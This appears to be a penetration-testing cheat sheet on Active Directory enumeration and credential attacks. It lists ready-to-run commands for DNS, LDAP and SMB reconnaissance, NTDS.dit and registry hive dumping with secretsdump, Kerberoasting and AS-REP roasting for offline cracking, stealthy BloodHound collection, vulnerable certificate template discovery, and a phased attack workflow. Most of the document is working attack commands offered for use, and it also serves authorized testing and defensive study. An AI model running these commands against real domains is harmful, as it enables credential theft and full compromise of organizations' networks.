Active Directory Enumeration
Non-Authenticated (External) Enumeration
DNS Reconnaissance
Purpose: Map domain infrastructure and discover services without credentials.
Zone Transfer Enumeration
# Standard zone transfer attempts
dig axfr @<DC-IP> <domain.com>
dnsrecon -d <domain.com> -t axfr
# Multiple DNS server attempts
for ns in $(dig +short NS <domain.com>); do
dig axfr @$ns <domain.com>
done
# Alternative zone transfer tools
fierce -dns <domain.com>
dnsenum <domain.com>Requirements: DNS server must allow zone transfers (AXFR queries)
Use Case: When DNS servers are misconfigured to allow zone transfers to any client
SRV Record Discovery
# Active Directory specific SRV records
dig SRV _ldap._tcp.dc._msdcs.<domain.com>
dig SRV _kerberos._tcp.dc._msdcs.<domain.com>
dig SRV _gc._tcp.<domain.com>
dig SRV _ldap._tcp.pdc._msdcs.<domain.com>
dig SRV _kpasswd._tcp.<domain.com>
# Additional service discovery
dig SRV _sip._tcp.<domain.com>
dig SRV _xmpp-server._tcp.<domain.com>
dig SRV _autodiscover._tcp.<domain.com>
# Automated SRV enumeration
python3 dns_srv_enum.py -d <domain.com>Requirements: Standard DNS query access
Use Case: Always available - SRV records are publicly queryable and required for AD functionality
DNS Bruteforcing and Subdomain Discovery
# Subdomain enumeration
gobuster dns -d <domain.com> -w /usr/share/wordlists/subdomains.txt -t 50
subfinder -d <domain.com> -silent
amass enum -d <domain.com>
# Reverse DNS lookups
dnsrecon -r 192.168.1.0/24
nmap -sL 10.0.0.0/8 | grep "not scanned" | awk '{print $2}' | sort -u
# DNS cache snooping
dig @<DNS-server> <target-domain> A +norecurseRequirements: Network access to DNS servers
Use Case: Discovery of additional services, development environments, and forgotten subdomains
LDAP Enumeration
LDAP Anonymous Binding
Purpose: Extract directory information when anonymous access is permitted.
Anonymous LDAP Queries
# Test anonymous binding capabilities
ldapsearch -x -h <DC-IP> -s base namingcontexts
ldapsearch -x -h <DC-IP> -s base defaultnamingcontext
# Extract base domain information
ldapsearch -x -h <DC-IP> -b "DC=domain,DC=com" "(objectClass=*)" -s base
# Anonymous user enumeration
ldapsearch -x -h <DC-IP> -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName description
ldapsearch -x -h <DC-IP> -b "DC=domain,DC=com" "(objectClass=person)" cn mail
# Anonymous group enumeration
ldapsearch -x -h <DC-IP> -b "DC=domain,DC=com" "(objectClass=group)" sAMAccountName memberRequirements: LDAP server configured to allow anonymous binds
Use Case: Legacy environments, misconfigured LDAP servers, or intentionally open directories
Automated Anonymous LDAP Extraction
# Complete anonymous domain dump
ldapdomaindump -u '' -p '' <DC-IP>
ldapdomaindump -u '' -p '' <DC-IP> --no-html --no-json --no-grep
# Alternative anonymous enumeration
enum4linux -a <DC-IP>
enum4linux -U -G -S -P <DC-IP>Requirements: Anonymous LDAP access enabled
Use Case: When organizations maintain legacy compatibility or have misconfigured LDAP security
SMB/NetBIOS Enumeration
Purpose: Leverage SMB null sessions and NetBIOS for domain reconnaissance.
SMB Null Session Enumeration
# Basic SMB enumeration
smbclient -L //<DC-IP> -N
smbmap -H <DC-IP> -u '' -p ''
# RPC null session exploitation
rpcclient -U "" -N <DC-IP>
rpcclient> enumdomusers
rpcclient> enumdomgroups
rpcclient> querydominfo
rpcclient> querydispinfo
rpcclient> enumdomainsRequirements: SMB server allows null sessions (RestrictAnonymous = 0)
Use Case: Windows 2000/2003 environments or systems with legacy compatibility settings
NetBIOS Information Gathering
# NetBIOS name resolution
nbtscan 192.168.1.0/24
nmblookup -A <target-IP>
# NetBIOS enumeration
enum4linux -n <DC-IP>
nmap -sU -p 137 --script nbstat <network-range>
# SNMP enumeration for NetBIOS info
snmpwalk -c public -v1 <DC-IP> 1.3.6.1.4.1.77.1.2.25Requirements: NetBIOS over TCP/IP enabled, SNMP community strings (if using SNMP) Use Case: Internal network enumeration, legacy Windows environments
Authenticated (Post-Compromise) Enumeration
Complete Domain Structure Mapping
Purpose: Extract comprehensive AD objects and relationships for attack planning.
LDAP Domain Dump
# Complete authenticated domain extraction
ldapdomaindump -u '<domain>\<username>' -p '<password>' <DC-IP>
ldapdomaindump -u '<domain>\<username>' -p '<password>' <DC-IP> --html --json --grep
ldapdomaindump -u '<domain>\<username>' -p '<password>' <DC-IP> -o /tmp/domain_data/
# Alternative authentication methods
ldapdomaindump -u '<username>' -p '<password>' -d <domain.com> <DC-IP>
ldapdomaindump --hashes :<NTLM-hash> -u '<username>' -d <domain.com> <DC-IP>Requirements: Valid domain credentials (user account) Use Case: Post-credential compromise, comprehensive domain mapping for attack planning
Credential Material Extraction
Purpose: Harvest authentication material for lateral movement and privilege escalation.
NTDS.dit and Registry Hive Extraction
# Complete credential dump from domain controller
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP>
python3 secretsdump.py -hashes :<NTLM-hash> <domain>/<username>@<DC-IP>
# NTDS.dit specific extraction
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -ntds
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -ntds -history
# Registry hive extraction from member servers
python3 secretsdump.py <domain>/<username>:<password>@<target-IP> -sam -security -system
# Output formatting options
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -outputfile creds -just-dc-ntlm
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -just-dc-user <target-user>Requirements: Administrative privileges on target system or DCSync rights for domain controllers Use Case: When you have admin access to systems or specific privileges like "Replicating Directory Changes"
Alternative Credential Extraction Methods
# Using different authentication methods
python3 secretsdump.py <domain>/<username> -hashes :<LM>:<NT> @<DC-IP>
python3 secretsdump.py <domain>/<username> -aesKey <AES-key> @<DC-IP>
python3 secretsdump.py <domain>/<username> -k -no-pass @<DC-IP>
# Kerberos ticket-based authentication
export KRB5CCNAME=/tmp/krb5cc_ticket
python3 secretsdump.py <domain>/<username>@<DC-IP> -k -no-passRequirements: Varies by method - Kerberos tickets, AES keys, or NTLM hashes Use Case: When you have alternative authentication material but not plaintext passwords
Service Account Discovery and Analysis
Purpose: Identify service accounts for Kerberoasting and AS-REP roasting attacks.
Kerberoasting Enumeration
# Basic SPN enumeration
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP>
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -debug
# Request TGS tickets for cracking
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request-user <target-user>
# Output format options
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -format hashcat
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile spns.txt
# Alternative authentication for Kerberoasting
python3 GetUserSPNs.py -hashes :<NTLM-hash> <domain>/<username> -dc-ip <DC-IP> -requestRequirements: Valid domain user credentials (any user can perform Kerberoasting) Use Case: Always applicable with domain credentials - service accounts are common targets
AS-REP Roasting
# Find accounts without pre-authentication
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP>
python3 GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <DC-IP> -no-pass
# Request AS-REP hashes
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP> -request
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -format hashcat
# Targeted AS-REP roasting
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP> -usersfile targets.txtRequirements: Domain user credentials or list of usernames for unauthenticated attempts Use Case: When accounts have "Do not require Kerberos preauthentication" enabled
Privilege Escalation Path Discovery
Purpose: Map AD relationships for privilege escalation opportunities.
BloodHound Data Collection
# Comprehensive collection
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c all
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c all --zip
# Stealth collection modes
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c DCOnly
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c Group,LocalAdmin --stealth
# Specific collection types
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c Session,Group
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c Trusts,Container
# Alternative authentication methods
bloodhound-python --hashes :<NTLM-hash> -u <username> -d <domain.com> -dc-ip <DC-IP> -c allRequirements: Domain user credentials, network access to domain controllers and targets Use Case: Mapping complex privilege relationships, planning privilege escalation paths
Multi-Protocol Information Gathering
Purpose: Leverage multiple protocols for comprehensive enumeration.
CrackMapExec Enumeration
# SMB-based enumeration
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --users
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --groups
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --shares
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --sessions
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --disks
# LDAP-based enumeration
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --users
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --groups
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --admin-count
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --trusted-for-delegation
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --password-not-required
# Advanced LDAP queries
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --kerberoasting
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --asreproast
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --gmsa
# Network-wide enumeration
crackmapexec smb 192.168.1.0/24 -u '<username>' -p '<password>' --shares
crackmapexec ldap 192.168.1.0/24 -u '<username>' -p '<password>' --usersRequirements: Valid domain credentials, network access to targets Use Case: Network-wide enumeration, multi-protocol correlation, bulk operations
Password Policy and Account Lockout Analysis
# Extract password policies
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --pass-pol
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --pass-pol
# Fine-grained password policy enumeration
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --fgppRequirements: Domain user credentials Use Case: Planning password attacks, understanding lockout thresholds
Security Identifier (SID) Analysis
Purpose: Enumerate objects through SID bruteforcing.
Comprehensive SID Enumeration
# Basic SID enumeration
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP>
python3 lookupsid.py guest@<DC-IP>
# Custom SID ranges
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> 500-2000
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> 1000-5000
# Maximum SID discovery
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> | tail -1Requirements: Valid credentials or guest access, RPC access to domain controllers Use Case: Discovering hidden accounts, service accounts, and non-standard objects
Advanced LDAP Enumeration
Purpose: Perform targeted queries for specific attack vectors.
Windapsearch Enumeration
# Basic enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password>
# Privileged user discovery
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --da
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --privileged-users
# Delegation enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --unconstrained-users
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --unconstrained-computers
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --constrained-users
# Computer enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --computers
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --dc
# Custom LDAP queries
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> \
--custom "(&(objectClass=user)(servicePrincipalName=*))"
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> \
--custom "(&(objectClass=computer)(operatingSystem=*Server*))"Requirements: Domain user credentials, LDAP access to domain controllers Use Case: Targeted enumeration for specific attack vectors, custom queries
Certificate Authority and PKI Discovery
Purpose: Enumerate PKI infrastructure for certificate-based attacks.
Certipy Enumeration
# Basic CA discovery
certipy find -u <username>@<domain.com> -p <password> -dc-ip <DC-IP>
certipy find -u <username>@<domain.com> -p <password> -dc-ip <DC-IP> -stdout
# Vulnerable template discovery
certipy find -u <username>@<domain.com> -p <password> -dc-ip <DC-IP> -vulnerable
certipy find -u <username>@<domain.com> -p <password> -dc-ip <DC-IP> -vulnerable -stdout
# Specific CA targeting
certipy find -u <username>@<domain.com> -p <password> -ca <CA-name>
certipy find -u <username>@<domain.com> -p <password> -ca <CA-name> -template <template-name>
# Alternative authentication
certipy find -hashes :<NTLM-hash> -u <username>@<domain.com> -dc-ip <DC-IP>Requirements: Domain user credentials, network access to Certificate Authority Use Case: When Active Directory Certificate Services (ADCS) is deployed
Application and Service Integration Discovery
Purpose: Identify integrated applications for additional attack surfaces.
Service-Specific Enumeration
# SQL Server discovery
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> | grep -i "mssql"
mssqlclient.py <domain>/<username>:<password>@<sql-server> -windows-auth
# Exchange discovery
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> | grep -i "exchange"
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> | grep -i "http"
# Web application services
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> | grep -i "http\|www"
# Additional service discovery
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> | grep -E "(ftp|ssh|vnc|rdp)"Requirements: Domain user credentials Use Case: Identifying integrated applications and services for expanded attack surface
Trust Relationship Analysis
Purpose: Map trust relationships for cross-domain attacks.
Trust Enumeration
# Basic trust discovery
python3 getTrusts.py <domain>/<username>:<password> -dc-ip <DC-IP>
# Cross-domain enumeration
for domain in $(cat trusted_domains.txt); do
echo "Enumerating $domain"
python3 GetADUsers.py $domain/<username>:<password> -all -dc-ip <DC-IP>
python3 GetUserSPNs.py $domain/<username>:<password> -dc-ip <DC-IP>
done
# Trust-specific BloodHound collection
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c TrustsRequirements: Domain user credentials, network access to trusted domains Use Case: Multi-domain environments with established trust relationships
Systematic Enumeration Workflow
Phase 1: Baseline Intelligence Gathering
# Complete domain structure mapping
ldapdomaindump -u '<domain>\<username>' -p '<password>' <DC-IP> --html --json -o /tmp/enum/
# Multi-protocol correlation
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --users --groups --computers
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --shares --sessionsPhase 2: Credential and Secret Extraction
# Administrative access required
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -outputfile /tmp/creds
# Service account targeting
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile /tmp/kerberoast
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile /tmp/asrepPhase 3: Privilege Escalation Mapping
# Relationship analysis
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c all -o /tmp/bloodhound/
# Advanced enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --privileged-users
certipy find -u <username>@<domain.com> -p <password> -dc-ip <DC-IP> -vulnerableLast updated
Was this helpful?